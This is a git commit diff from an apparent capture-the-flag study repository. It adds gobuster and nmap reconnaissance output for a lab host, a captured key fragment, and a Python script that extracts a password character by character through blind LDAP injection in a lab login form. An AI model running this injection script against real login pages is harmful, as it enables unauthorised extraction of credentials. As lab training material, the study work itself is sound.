2025-12-08

2025-12-08 17:15:06 +01:00
parent 0054cc02b1
commit 1b6dfea090
4 changed files with 155 additions and 0 deletions
--- a/AoC/2025/07/gobuster.txt
+++ b/AoC/2025/07/gobuster.txt
@@ -0,0 +1,3 @@
+/terminal            [36m (Status: 302)[0m [Size: 201][34m [--> /unlock][0m
+/unlock              [32m (Status: 200)[0m [Size: 1257]
+/tty                 [36m (Status: 301)[0m [Size: 162][34m [--> http://10.82.133.11/tty/][0m
--- a/AoC/2025/07/nmap_scan.txt
+++ b/AoC/2025/07/nmap_scan.txt
@@ -0,0 +1,104 @@
+# Nmap 7.95 scan initiated Mon Dec  8 07:47:46 2025 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap_scan.txt 10.82.133.11
+Nmap scan report for 10.82.133.11
+Host is up (0.042s latency).
+Not shown: 65531 filtered tcp ports (no-response)
+PORT      STATE SERVICE VERSION
+22/tcp    open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
+80/tcp    open  http    nginx
+|_http-title: TBFC QA \xE2\x80\x94 EAST-mas
+21212/tcp open  ftp     vsftpd 3.0.5
+| ftp-syst: 
+|   STAT: 
+| FTP server status:
+|      Connected to 192.168.156.241
+|      Logged in as ftp
+|      TYPE: ASCII
+|      No session bandwidth limit
+|      Session timeout in seconds is 300
+|      Control connection is plain text
+|      Data connections will be plain text
+|      At session startup, client count was 3
+|      vsFTPd 3.0.5 - secure, fast, stable
+|_End of status
+| ftp-anon: Anonymous FTP login allowed (FTP code 230)
+|_Can't get directory listing: TIMEOUT
+25251/tcp open  unknown
+| fingerprint-strings: 
+|   DNSStatusRequestTCP, DNSVersionBindReqTCP, LDAPBindReq, NULL, RPCCheck, SMBProgNeg, X11Probe: 
+|     TBFC maintd v0.2
+|     Type HELP for commands.
+|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, LDAPSearchReq, RTSPRequest: 
+|     TBFC maintd v0.2
+|     Type HELP for commands.
+|     unknown command
+|     unknown command
+|   Help: 
+|     TBFC maintd v0.2
+|     Type HELP for commands.
+|     Commands: HELP, STATUS, GET KEY, QUIT
+|   Kerberos, LPDString, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
+|     TBFC maintd v0.2
+|     Type HELP for commands.
+|     unknown command
+|   SIPOptions: 
+|     TBFC maintd v0.2
+|     Type HELP for commands.
+|     unknown command
+|     unknown command
+|     unknown command
+|     unknown command
+|     unknown command
+|     unknown command
+|     unknown command
+|     unknown command
+|     unknown command
+|     unknown command
+|_    unknown command
+1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+SF-Port25251-TCP:V=7.95%I=7%D=12/8%Time=693674F2%P=aarch64-unknown-linux-g
+SF:nu%r(NULL,29,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20for\x20commands\
+SF:.\n")%r(GenericLines,49,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20for\x
+SF:20commands\.\nunknown\x20command\nunknown\x20command\n")%r(GetRequest,4
+SF:9,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20for\x20commands\.\nunknown\
+SF:x20command\nunknown\x20command\n")%r(HTTPOptions,49,"TBFC\x20maintd\x20
+SF:v0\.2\nType\x20HELP\x20for\x20commands\.\nunknown\x20command\nunknown\x
+SF:20command\n")%r(RTSPRequest,49,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x
+SF:20for\x20commands\.\nunknown\x20command\nunknown\x20command\n")%r(RPCCh
+SF:eck,29,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20for\x20commands\.\n")%
+SF:r(DNSVersionBindReqTCP,29,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20for
+SF:\x20commands\.\n")%r(DNSStatusRequestTCP,29,"TBFC\x20maintd\x20v0\.2\nT
+SF:ype\x20HELP\x20for\x20commands\.\n")%r(Help,4F,"TBFC\x20maintd\x20v0\.2
+SF:\nType\x20HELP\x20for\x20commands\.\nCommands:\x20HELP,\x20STATUS,\x20G
+SF:ET\x20KEY,\x20QUIT\n")%r(SSLSessionReq,39,"TBFC\x20maintd\x20v0\.2\nTyp
+SF:e\x20HELP\x20for\x20commands\.\nunknown\x20command\n")%r(TerminalServer
+SF:Cookie,39,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20for\x20commands\.\n
+SF:unknown\x20command\n")%r(TLSSessionReq,39,"TBFC\x20maintd\x20v0\.2\nTyp
+SF:e\x20HELP\x20for\x20commands\.\nunknown\x20command\n")%r(Kerberos,39,"T
+SF:BFC\x20maintd\x20v0\.2\nType\x20HELP\x20for\x20commands\.\nunknown\x20c
+SF:ommand\n")%r(SMBProgNeg,29,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20fo
+SF:r\x20commands\.\n")%r(X11Probe,29,"TBFC\x20maintd\x20v0\.2\nType\x20HEL
+SF:P\x20for\x20commands\.\n")%r(FourOhFourRequest,49,"TBFC\x20maintd\x20v0
+SF:\.2\nType\x20HELP\x20for\x20commands\.\nunknown\x20command\nunknown\x20
+SF:command\n")%r(LPDString,39,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20fo
+SF:r\x20commands\.\nunknown\x20command\n")%r(LDAPSearchReq,49,"TBFC\x20mai
+SF:ntd\x20v0\.2\nType\x20HELP\x20for\x20commands\.\nunknown\x20command\nun
+SF:known\x20command\n")%r(LDAPBindReq,29,"TBFC\x20maintd\x20v0\.2\nType\x2
+SF:0HELP\x20for\x20commands\.\n")%r(SIPOptions,D9,"TBFC\x20maintd\x20v0\.2
+SF:\nType\x20HELP\x20for\x20commands\.\nunknown\x20command\nunknown\x20com
+SF:mand\nunknown\x20command\nunknown\x20command\nunknown\x20command\nunkno
+SF:wn\x20command\nunknown\x20command\nunknown\x20command\nunknown\x20comma
+SF:nd\nunknown\x20command\nunknown\x20command\n");
+Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
+Aggressive OS guesses: Linux 5.18 (96%), Linux 5.4 (94%), Cisco Unified Communications Manager VoIP adapter (92%), Linux 2.6.26 (92%), Linux 2.6.18 (89%), Android TV OS 11 (Linux 4.19) (88%), Android 7.1.2 (Linux 3.10) (88%), IPFire 2.25 firewall (Linux 4.14) (88%), IPFire 2.27 (Linux 5.15 - 6.1) (88%), Linux 2.6.32 (88%)
+No exact OS matches for host (test conditions non-ideal).
+Network Distance: 3 hops
+Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel
+
+TRACEROUTE (using port 80/tcp)
+HOP RTT      ADDRESS
+1   42.07 ms 192.168.128.1
+2   ...
+3   42.69 ms 10.82.133.11
+
+OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Mon Dec  8 07:52:34 2025 -- 1 IP address (1 host up) scanned in 288.40 seconds
--- a/AoC/2025/07/tbfc_qa_key1
+++ b/AoC/2025/07/tbfc_qa_key1
@@ -0,0 +1 @@
+KEY1:3aster_
--- a/Walkthroughs/LDAPi/script.py
+++ b/Walkthroughs/LDAPi/script.py
@@ -0,0 +1,47 @@
+import requests
+from bs4 import BeautifulSoup
+import string
+import time
+
+# Base URL
+url = 'http://10.82.144.176/blind.php'
+
+# Define the character set
+char_set = string.ascii_lowercase + string.ascii_uppercase + string.digits + "._!@#$%^&*()"
+
+# Initialize variables
+successful_response_found = True
+successful_chars = ''
+
+headers = {
+    'Content-Type': 'application/x-www-form-urlencoded'
+}
+
+while successful_response_found:
+    successful_response_found = False
+
+    for char in char_set:
+        #print(f"Trying password character: {char}")
+
+        # Adjust data to target the password field
+        data = {'username': f'{successful_chars}{char}*)(|(&','password': 'pwd)'}
+
+        # Send POST request with headers
+        response = requests.post(url, data=data, headers=headers)
+
+        # Parse HTML content
+        soup = BeautifulSoup(response.content, 'html.parser')
+
+        # Adjust success criteria as needed
+        paragraphs = soup.find_all('p', style='color: green;')
+
+        if paragraphs:
+            successful_response_found = True
+            successful_chars += char
+            print(f"Successful character found: {char}")
+            break
+
+    if not successful_response_found:
+        print("No successful character found in this iteration.")
+
+print(f"Final successful payload: {successful_chars}")